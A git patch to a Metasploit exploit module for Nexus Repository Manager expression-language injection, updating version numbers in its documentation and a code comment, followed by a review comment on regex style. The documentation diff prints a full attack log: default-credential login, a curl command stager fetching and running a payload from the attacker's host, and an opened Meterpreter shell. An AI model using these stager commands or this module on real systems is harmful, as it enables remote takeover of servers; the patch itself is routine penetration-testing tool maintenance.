From baae9db092a4eaa4e6f3df65d22eded18d5fd20c Mon Sep 17 00:00:00 2001
From: William Vu
Date: Tue, 7 Apr 2020 19:28:37 -0500
Subject: [PATCH] Fix some more things
---
 .../http/nexus_repo_manager_el_injection.md | 46 +++++++++----------
 .../http/nexus_repo_manager_el_injection.rb | 2 +-
 2 files changed, 24 insertions(+), 24 deletions(-)
diff --git a/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md b/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
index f39a17f3f0..9aee577167 100644
--- a/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
+++ b/documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md
@@ -8,8 +8,8 @@ as the "nexus" user.
 
 ### Setup
 
-Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.0`
-(note the added `3.21.0` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running).
+Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.1`
+(note the added `3.21.1` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running).
 
 ### Targets
 
@@ -35,7 +35,7 @@ Set this to a valid Nexus password.
 
 ## Scenarios
 
-### Nexus Repository Manager 3.21.1-05 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3)
+### Nexus Repository Manager 3.21.1-01 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3)
 
 ```
 msf5 > use exploit/linux/http/nexus_repo_manager_el_injection
@@ -62,31 +62,31 @@ msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run
 
 [*] Started reverse TCP handler on 192.168.1.3:4444
 [*] Executing automatic check (disable AutoCheck to override)
-[+] The target appears to be vulnerable. Nexus 3.21.0-05 is a vulnerable version.
+[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
 [*] Logging in with admin:admin
-[+] Logged in with NXSESSIONID=b15d9cfc-f8ad-4aba-b203-c36aa78e4670;
-[*] Using URL: http://0.0.0.0:8080/SjSMKKomKhhGj
-[*] Local IP: http://192.168.1.3:8080/SjSMKKomKhhGj
-[*] Generated command stager: ["curl -so /tmp/dXZVXFXS http://192.168.1.3:8080/SjSMKKomKhhGj", "chmod +x /tmp/dXZVXFXS", "/tmp/dXZVXFXS", "rm -f /tmp/dXZVXFXS"]
-[*] Executing command: curl -so /tmp/dXZVXFXS http://192.168.1.3:8080/SjSMKKomKhhGj
-[*] Client 192.168.1.3 (curl/7.61.1) requested /SjSMKKomKhhGj
+[+] Logged in with NXSESSIONID=8b6fd077-1830-4e2b-90e8-2997d260b5c0;
+[*] Using URL: http://0.0.0.0:8080/t6NXrxF
+[*] Local IP: http://192.168.1.3:8080/t6NXrxF
+[*] Generated command stager: ["curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF", "chmod +x /tmp/hgzeytII", "/tmp/hgzeytII", "rm -f /tmp/hgzeytII"]
+[*] Executing command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
+[+] Successfully executed command: curl -so /tmp/hgzeytII http://192.168.1.3:8080/t6NXrxF
+[*] Client 192.168.1.3 (curl/7.61.1) requested /t6NXrxF
 [*] Sending payload to 192.168.1.3 (curl/7.61.1)
-[+] Successfully executed command: curl -so /tmp/dXZVXFXS http://192.168.1.3:8080/SjSMKKomKhhGj
-[*] Command Stager progress - 52.63% done (60/114 bytes)
-[*] Executing command: chmod +x /tmp/dXZVXFXS
-[+] Successfully executed command: chmod +x /tmp/dXZVXFXS
-[*] Command Stager progress - 71.93% done (82/114 bytes)
-[*] Executing command: /tmp/dXZVXFXS
-[+] Successfully executed command: /tmp/dXZVXFXS
-[*] Command Stager progress - 83.33% done (95/114 bytes)
-[*] Executing command: rm -f /tmp/dXZVXFXS
-[+] Successfully executed command: rm -f /tmp/dXZVXFXS
-[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:62404) at 2020-04-04 00:39:23 -0500
-[*] Command Stager progress - 100.00% done (114/114 bytes)
+[*] Command Stager progress - 50.00% done (54/108 bytes)
+[*] Executing command: chmod +x /tmp/hgzeytII
+[+] Successfully executed command: chmod +x /tmp/hgzeytII
+[*] Command Stager progress - 70.37% done (76/108 bytes)
+[*] Executing command: /tmp/hgzeytII
+[+] Successfully executed command: /tmp/hgzeytII
+[*] Command Stager progress - 82.41% done (89/108 bytes)
+[*] Executing command: rm -f /tmp/hgzeytII
+[+] Successfully executed command: rm -f /tmp/hgzeytII
+[*] Command Stager progress - 100.00% done (108/108 bytes)
+[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.3:53094) at 2020-04-07 19:25:38 -0500
 [*] Server stopped.
 
 meterpreter > getuid
-Server username: no-user @ 5c29594842aa (uid=200, gid=200, euid=200, egid=200)
+Server username: no-user @ 282665c16215 (uid=200, gid=200, euid=200, egid=200)
 meterpreter > sysinfo
 Computer : 172.17.0.2
 OS : Red Hat Enterprise Linux 8 (Linux 4.19.76-linuxkit)
diff --git a/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb b/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
index 8c8283e25a..b6fcf344a5 100644
--- a/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
+++ b/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Exploit::Remote
 return CheckCode::Unknown('Target did not respond with Server header.')
 end
 
-# Server: Nexus/3.21.0-05 (OSS)
+# Server: Nexus/3.21.1-01 (OSS)
 version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first
 
 unless version
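Review bot: The updated `# Server: Nexus/3.21.1-01 (OSS)` comment only gives a sample header; it would help more if it also said what the following line extracts, because the `[\d.-]+` class keeps the build suffix, so `version` comes out as `3.21.1-01` rather than `3.21.1`. Suggested wording: `# e.g. Server: Nexus/3.21.1-01 (OSS) -> version "3.21.1-01" (build suffix is kept)`. As a point of style on the unchanged extraction line, `scan(...).flatten.first` can be written `res.headers['Server'][%r{\ANexus/([\d.-]+)}, 1]`, and `\A` states the intent better than `^`, which also matches after an embedded newline. The enclosing method starts and ends outside the hunk, so whatever later compares `version` is not visible here; if it is a version comparison it presumably has to cope with the `-01` suffix.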